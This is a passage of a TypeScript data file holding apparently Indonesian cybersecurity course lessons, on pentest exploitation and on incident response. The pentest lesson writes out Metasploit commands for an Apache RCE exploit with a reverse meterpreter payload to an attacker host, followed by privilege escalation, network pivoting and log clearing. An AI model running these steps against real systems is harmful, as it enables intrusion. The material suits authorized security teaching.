          { judul: "Web app scan dengan Burp Active Scanner", aksi: "Buka Burp Suite Pro -> Dashboard -> New Scan -> pilih target URL. Crawl + audit (passive + active). Burp otomatis crawl semua URL, form, dan test untuk SQLi/XSS/CSRF/dll.\nOutput: Issues tab -> critical -> informational. Banyak false positive perlu manual validation.", expected: "Daftar issues dengan detail per vulnerability (request/response highlighted, remediation suggestion)." },
        ],
        outputAkhir: "Berhasil melakukan active scanning dan vulnerability analysis.",
        kesalahanUmum: [
          { masalah: "Nmap terbakar / scan lambat", solusi: "Adjust timing: -T2 (polite) atau -T1 (sneaky). Rate limit." },
          { masalah: "Banyak false positive di Burp", solusi: "Manual validation: re-do payload di Repeater. Konfirmasi vuln benar sebelum dicatat." },
        ],
      },
      {
        nama: "Metode 3: Exploitation dengan Metasploit + Post-Exploitation",
        level: "lanjut",
        deskripsi: "Metasploit Framework untuk eksploitasi vulnerability teridentifikasi, escalate privilege, dan pivot ke target lain.",
        prasyarat: ["Metasploit installed (Kali Linux default)", "Vulnerability teridentifikasi yang ada di Metasploit DB", "Target lab berizin"],
        langkah: [
          { judul: "Cari exploit via searchsploit + msfconsole", aksi: "searchsploit Apache 2.4.49 -> list exploit Exploit-DB (offline).\nAtau msfconsole: search type:exploit name:Apache 2.4.\nPilih module yang match dengan vulnerability identified.", command: "searchsploit Apache 2.4.49\nmsf6 > search type:exploit name:Apache 2.4", expected: "Module exploit ditemukan." },
          { judul: "Setup + run exploit module", aksi: "msfconsole:\nuse exploit/multi/http/apache_normalize_path_rce\nSet options:\nset RHOSTS target_ip\nset LHOST attacker_ip\nset PAYLOAD linux/x64/meterpreter_reverse_tcp\ncheck  # dry-run\nrun    # exploit sekarang", command: "msf6 > use exploit/multi/http/apache_normalize_path_rce\nset RHOSTS 10.10.10.5\nset LHOST attacker_ip\nset PAYLOAD linux/x64/meterpreter_reverse_tcp\nrun", expected: "Meterpreter session terbuka. Shell interaktif di target." },
          { judul: "Post-exploitation: enumerate + priv escalation", aksi: "Dalam Meterpreter:\nsysinfo  # OS info\ngetuid   # current user\nshell    # pindah ke bash shell di target\nUntuk privesc: download LinPEAS.sh atau LinEnum.sh ke target, run, identifikasi privesc vector.", expected: "Initial access. Privilege escalation vector identified via LinPEAS." },
          { judul: "Pivot ke internal network + lateral movement", aksi: "Setelah privesc ke admin, scan internal network target:\nrun autoroute -s 10.10.20.0/24\nbackground\nuse auxiliary/scanner/portscan/tcp\nset RHOSTS 10.10.20.0/24\nset PORTS 22,80,443,445\nrun\n\nIdentifikasi host internal lain. Re-exploit untuk lateral movement.", expected: "Internal network host identified + able to move laterally." },
          { judul: "Reporting: generate finding report", aksi: "Setelah semua demo selesai + clear logs: buat report.\nStructure typical:\n1) Executive Summary (1 halaman untuk C-level)\n2) Methodology\n3) Findings (per vulnerability): title, severity, CVSS, description, evidence (screenshot), impact, remediation\n4) Appendix (raw scan output)", expected: "Laporan pentest lengkap yang dapat diserahkan ke klien untuk remediation." },
        ],
        outputAkhir: "Berhasil eksploitasi target + privilege escalation + lateral movement + laporan pentest komprehensif.",
        kesalahanUmum: [
          { masalah: "Exploit gagal / session tidak connect", solusi: "Check firewall. Test dengan simple payload dulu. Reconfirm exploit compatibility dengan OS + service version target." },
          { masalah: "Lupa clear log / skip cleanup", solusi: "Selalu lakukan cleanup post-test: hapus tools uploaded, restore config, log ke klien apa yang diubah." },
        ],
      },
    ],
    mitigasi: "Pertahanan dari Pentest attack (tetap berlaku meskipun white hat): Patch Management (always patch critical dalam 14 hari), Principle of Least Privilege (service account hanya punya minimum permission), Network Segmentation (server internal tidak boleh expose langsung), IDS/IPS (detect scans), Logging & Monitoring (centralized log SIEM), Incident Response Plan, Defense in depth (multiple control layers).",
    latihan: ["Download TryHackMe atau HackTheBox free tier. Selesaikan pertama 10 box untuk practice.", "Setup Kali Linux VM (VirtualBox). Run OWASP WebGoat lab.", "Selesaikan OffSec PG Play / VulnHub box untuk exploit teknik.", "Pelajari cara menulis profesional pentest report."],
    faq: [{ q: "Apakah pentest legal tanpa izin?", a: "Tidak. Tanpa izin tertulis = unauthorized access = ilegal (UU ITE, CFAA). Selalu dapat GoJail Letter dari klien." }, { q: "Berapa biaya professional pentest?", a: "Tergantung scope: web app saja $5-15k. Full network pentest enterprise $50-200k. Lab testing $500-2k." }, { q: "Certified pentester mana yang paling renowned?", a: "OSCP (OffSec) paling praktikal. CEH teoritis. CREST standar resmi. GPEN dari SANS." }, { q: "Bagaimana cara mulai belajar pentest?", a: "Mulai dengan TryHackMe (beginner-friendly), kemudian HackTheBox (intermediate). Baca The Web Application Hacker's Handbook." }],
    ringkasan: ["Pentest = simulasi attack berizin untuk identifikasi vulnerability", "Methodology: recon -> threat model -> vuln scan -> exploit -> report", "Tools: Nmap (port scan), Burp (web), Metasploit (exploit), OpenVAS (vuln)", "OSINT passive zero-detection; active scan butuh izin", "Post-exploitation: privilege escalation + lateral movement"],
    materiRelated: ["Encryption at Rest", "MFA", "Incident Response"],
  } as MateriData,

  // ============================ INCIDENT RESPONSE ============================
  {
    judul: "🚨 Incident Response Playbook — Prosedur Saat Terjadi Breach",
    emoji: "🚨",
    deskripsi: "Pelajari 6 phase NIST Incident Response Framework, ISO 27035, tabletop exercise, dan komunikasi krisis saat breach terjadi.",
    level: "menengah",
    harga: 20000,
    hargaCoret: 30000,
    isGratis: false,
    tipe: "pertahanan",
    tujuan: "Kamu paham NIST IR framework 6 phase, mampu handle initial triage saat incident, dan tahu cara post-mortem + lessons learned.",
    analogy: "Bayangkan rumah kebakaran. Anda butuh rencana darurat: panggilan pemadam, evakuasi keluarga, cek barang berharga, klaim asuransi. Incident response persis - prosedur terstruktur saat terjadi insiden keamanan.",
    apaItu: "Incident Response (IR) adalah proses terstruktur untuk handle insiden keamanan komputer. Framework NIST SP 800-61 memiliki 6 phase:\n\n1) Preparation: people, tools, training\n2) Identification: detect + analyze incident\n3) Containment: limit damage (short-term + long-term)\n4) Eradication: remove threat (malware, attacker access)\n5) Recovery: restore systems ke normal ops\n6) Lessons Learned: post-mortem untuk improve",
    caraKerja: "Typical IR lifecycle setelah alert triggered:\n1) SOC analyst detect anomaly (IDS, EDR, log analysis)\n2) Triage: confirm incident, severity classification\n3) Activate IR team, assign roles\n4) Save evidence (disk image, memory dump, log) untuk forensic\n5) Contain: isolate affected system (network disconnect, disable account)\n6) Eradicate: remove backdoor, malware, attacker account\n7) Recover: rebuild system, restore backup, monitor ketat\n8. Communicate: legal, PR, customer notification (GDPR 72 jam)\n9) Post-mortem: document lessons, update playbook + controls",
    asciiDiagram: "NIST IR FRAMEWORK (6 PHASES):\n\n  +-----------------+\n  | Preparation     |\n  +-----------------+\n         |\n         v\n  +-----------------+\n  | Identification  |\n  +-----------------+\n         |\n         v\n  +-----------------+\n  | Containment     |\n  +-----------------+\n         |\n         v\n  +-----------------+\n  | Eradication     |\n  +-----------------+\n         |\n         v\n  +-----------------+\n  | Recovery        |\n  +-----------------+\n         |\n         v\n  +-----------------+\n  | Lessons Learned |\n  +-----------------+",
    senjata: { pc: "TheHive (incident management platform), MISP (threat intel sharing), GRR Rapid Response (remote forensics Google), Volatility (memory forensics), Autopsy (disk forensics), Wireshark (network forensics).", hp: "Tidak praktis (IR butuh workstation). Mobile untuk receive alert / off-hour response." },
    metode: [
      {
        nama: "Metode 1: Incident Detection + Triage (Pemula)",
        level: "pemula",
        deskripsi: "Sebelum respond, Anda harus detect. Dari alert mana? Cek log, IDS, EDR untuk identifikasi initial indicator.",
        prasyarat: ["Log centralized (ELK / Splunk / Wazuh)", "IDS / EDR (Suricata + OSSEC / Wazuh Agent)"],
        langkah: [
          { judul: "Baca alert dari SIEM / EDR", aksi: "Kalian login ke Wazuh / Splunk dashboard. Alert Multiple failed SSH login atau Suspicious PowerShell execution muncul.\n\nStep 1: Buka alert details. Lihat:\n- Source IP, destination IP\n- User account terkait\n- Time window\n- Severity classification", expected: "Alert detail tersedia. Catat: IP source, user, timestamp." },
          { judul: "Triage: confirm vs false positive", aksi: "Cross-check alert dengan log lain. Failed SSH -> cek auth.log: ada legit reason (typo, migration) atau tidak? PowerShell alert -> cek parent process: user-triggered or service-triggered?\n\nKalau fail 5x dengan user berbeda dari source IP tunggal -> potential brute force. Kalau fail 5x dari IP sendiri -> typo.", expected: "True positive atau false positive classification." },
          { judul: "Classify severity (NIST)", aksi: "NIST severity rubric:\n- Low: single user, no data exfil, contained\n- Medium: targeted user, possible data leak, lateral movement suspected\n- High: data exfiltration confirmed, multiple systems affected\n- Critical: production system down, customer data exposed, ransomware\n\nAssign severity -> prioritas handle.\nColoring alert accordingly di SIEM.", expected: "Alert classified + assigned severity." },
          { judul: "Document initial findings", aksi: "Buka ticket di TheHive / Jira. Include:\n- Alert ID, source\n- Initial detection time\n- Affected systems / users\n- Severity\n- Initial hypothesis (apa attacker mungkin dilakukan)", expected: "Incident ticket terbuka dengan initial details." },
        ],
        outputAkhir: "Alert triaged + severity classified + ticket open. Ready untuk containment.",
        kesalahanUmum: [
          { masalah: "Alert terlalu banyak (alert fatigue)", solusi: "Tune SIEM rule untuk reduce false positive. Prioritas severity tinggi, low -> batched review." },
          { masalah: "Lupa dokumentasi", solusi: "Setiap step IR harus documented. Forensic chain of custody critical kalau incident masuk hukum." },
        ],
      },
      {
        nama: "Metode 2: Containment + Eradication (Menengah)",
        level: "menengah",
        deskripsi: "Setelah confirm incident, immediate containment: isolasi attacker, prevent escalation. Lalu eradication.",
        prasyarat: ["Network access / firewall admin access", "EDR admin (CrowdStrike / SentinelOne / Defender)", "Backup verified"],
        langkah: [
          { judul: "Short-term containment: isolate", aksi: "Untuk compromised machine: disconnect from network (jangan matikan - preserve memory untuk forensic).\n- EDR: Network Containment -> blocks all network traffic selain EDR channel.\n- Firewall: block source IP attacker di perimeter.\n- Identity: disable user account compromised, revoke aktif session.\n- Disable port / service yang dieksploitasi sementara.", command: "EDR: Linux/Mac: sudo iptables -A OUTPUT -d <attacker_ip> -j DROP\nCrowdStrike Falcon: Network Containment host dari console.", expected: "Host isolated. Attacker can't pivot ke lateral." },
          { judul: "Collect forensic evidence", aksi: "Sebelum eradication: collect volatile evidence:\n- Memory dump: AVML / LiME untuk Linux, FTK Imager / WinPmem untuk Windows. Save ke external drive.\n- Disk image: dd atau FTK. Chain of custody: hash (SHA256) + signature + witness.\n- Log: gather dari SIEM, EDR, aplikasi.\n- Network: capture packet terakhir (kalau belum hilang).", expected: "Memory + disk image + logs tersimpan dengan chain-of-custody." },
          { judul: "Eradication: remove threat", aksi: "Identifikasi root cause: first compromise. Misalnya Phishing -> train user, Misconfig -> patch, Vulnerability -> patch.\n\nActions:\n- Remove malware / webshell / backdoor\n- Rotate compromised credentials (password + API keys + tokens)\n- Patch vulnerabilities exploited\n- Restore dari safe backup (verified clean)", expected: "Root cause eliminated. Vulnerable patched." },
          { judul: "Recovery: restore to normal operations", aksi: "Setelah eradication: rebuild system dari clean image atau restore verified-clean backup. Test functionality dalam isolated environment dulu.\n\nMonitor closely untuk 2-4 minggu (threat actor kadang plant backdoor). Hunt untuk indicator of compromise (IoC) yang lain di seluruh environment.\n\nRestore connectivity bertahap. Re-verify all systems clean.", expected: "Production restored. Tight monitoring active." },
        ],
        outputAkhir: "Host isolated + evidence collected + threat removed + system restored.",
        kesalahanUmum: [
          { masalah: "Network isolation malah trigger attacker backdoor", solusi: "Selalu lakukan forensic analysis dulu sebelum isolation. Identify semua persistence mechanism." },
          { masalah: "Forensic evidence corrupt / incomplete", solusi: "Gunakan write-blocker untuk disk imaging. Verify hash sebelum analysis." },
        ],
      },
      {
        nama: "Metode 3: Lessons Learned + Tabletop Exercise (Lanjut)",
        level: "lanjut",
        deskripsi: "Setelah incident di-close, lessons learned penting: improve process untuk prevent recurrence. Plus: latihan (tabletop exercise) untuk preparedness.",
        prasyarat: ["Incident closed + semua evidence documented", "IR team available untuk retrospective"],
        langkah: [
          { judul: "Compile lessons learned document", aksi: "Kumpulkan tim untuk retrospective (blameless). Diskusikan:\n- Detection: cukup cepat? Alert efektif?\n- Response: contain berhasil? Ada confusion?\n- Communication: customer notify tepat waktu? Internal coordination?\n- Process: apa yang well, apa yang gap?\n\nDocument: incident timeline, root cause, contributing factors, recommendations, action items.", expected: "Lessons learned document + action items with owner + deadline." },
          { judul: "Update IR playbook + SIEM rules", aksi: "Berdasarkan lesson learned: tambah detection rule untuk vulnerability exploited (prevent recurrence). Update playbook dengan streamline steps. Train tim untuk gap knowledge.\n\nTrack action item completion di Jira. Quarterly review playbook updates.", expected: "SIEM rules updated. Playbook version up. Team trained." },
          { judul: "Tabletop exercise untuk preparedness", aksi: "Untuk practiced handling incident sebelum terjadi: schedule quarterly tabletop exercise.\n\nScenario: Ransomware attack encrypts file server -> IR team respond in simulation mode:\n- Identify lead (IR commander)\n- Contain (decide: isolate or not?)\n- Communicate (PR/Legal notifications)\n- Eradicate (decryption strategy? backup verification?)\n- Recover (RTO target met?)\n\nDiscuss outcome + improvement.", expected: "Tabletop completed. Improvement identified + acted upon." },
          { judul: "External coordination: legal + PR + customer", aksi: "Untuk major incident (data breach customer PII), coordinate:\n- Legal: apakah ada regulasi yang require notification (GDPR 72 jam, UU PDP, dll)?\n- PR: prepared statement untuk media + social media.\n- Customer: email/data breach notification letter within 24-72 jam.\n- Insurance: cyber insurance claim.\n- Regulators: notification sesuai yurisdiksi.\nPre-prepared templates sangat membantu saat incident terjadi.", expected: "Communication plan + template prepared. Coordination established." },
        ],
        outputAkhir: "Lessons learned documented + playbook improved + team practiced + external communication prepared.",
        kesalahanUmum: [
          { masalah: "Lessons learned cuma formalitas tanpa action", solusi: "Action items harus punya owner + deadline. Review di management meeting." },
          { masalah: "Tabletop exercise tidak realistic", solusi: "Buat scenario challenging tapi realistic. Inject complications (backup corrupt, attacker pivot ke DC lain) -> force team untuk think hard." },
        ],
      },
    ],
    mitigasi: "Pertahanan dari incident: preparedness: IR Plan (documented, tested, updated annually), Team + Roles (IR Commander, Comms, Tech Lead, Security Analyst, Forensic Specialist), Tools Pre-deployed (EDR terinstall, SIEM centralized log, forensic tools ready, encrypted comms), Backups (3-2-1 backup strategy, test restore periodically), Threat Intel (subscribe MITRE ATT&CK + threat feeds), Insurance (cyber insurance cover costs), Tabletop + Red Team (latih rutin), Legal/Reg.Compliance (GDPR 72 jam notification).",
    latihan: ["Buat IR playbook sederhana untuk lab Anda: 6 phase NIST, template untuk ticket, contact list, tool tips.", "Setup Wazuh di lab: monitoring Linux endpoint, configure rule untuk detect failed SSH brute force.", "Setup ELK Stack di lab. Forward syslog dari beberapa host, visualize login anomaly.", "Run tabletop exercise dengan tim: simulate ransomware attack + phishing breach scenarios.", "Pelajari NIST IR framework mendalam + ambil SANS FOR508 course."],
    faq: [
      { q: "Berapa lama response time ideal?", a: "NIST tidak kasih angka fixed, tergantung severity. Critical incident: hours untuk contain. Low severity: 1-2 minggu." },
      { q: "Untuk IR, in-house atau retainer ke firm?", a: "Both. In-house untuk initial response + monitoring. Retainer dengan IR firm (Mandiant, FireEye, Crowdstrike Services) untuk Expertise forensik." },
      { q: "Apakah forensic evidence admissable di pengadilan?", a: "Ya, selama chain of custody maintained (write-blocker, hash verification, witness signed)." },
    ],
    ringkasan: ["IR framework NIST 6 phase: preparation -> identification -> containment -> eradication -> recovery -> lessons learned", "Detection adaptif: SIEM + EDR + log analysis + threat intel", "Containment prioritas: isolate threat, jangan worsen", "Evidence: memory dump + disk image + log collected dengan chain of custody", "Communication: legal/PR/customer/regulator coordination critical", "Tabletop exercise berkualitas tinggi untuk preparedness", "Backup 3-2-1 = last line of defense"],
    materiRelated: ["Encryption at Rest", "MFA", "Pentest Methodology", "SOC operations"],
  } as MateriData,
];

export default pertahanan2;
